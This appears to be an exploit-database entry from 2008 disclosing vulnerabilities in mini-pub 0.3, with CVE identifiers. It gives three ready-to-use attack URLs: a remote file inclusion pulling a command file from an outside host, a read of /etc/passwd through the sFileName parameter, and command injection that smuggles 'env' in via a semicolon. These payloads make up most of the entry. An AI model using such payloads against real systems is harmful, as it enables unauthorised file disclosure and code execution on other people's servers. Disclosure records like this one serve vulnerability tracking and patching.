mini-pub 0.3 - File Disclosure / Code Execution



EKU-ID: 14609 CVE: OSVDB-50786;CVE-2008-5581;OSVDB-50785;CVE-2008-5580;OSVDB-50782;CVE-2008-5579 OSVDB-ID:
Author: muuratsalo Published: 2008-10-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


mini-pub 0.3 multiple vulnerabilities

download   http://sourceforge.net/projects/mini-pub/

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploits
1. local file disclosure
http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt?

2. local file disclosure
http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd

3. command execution
http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv

# milw0rm.com [2008-10-12]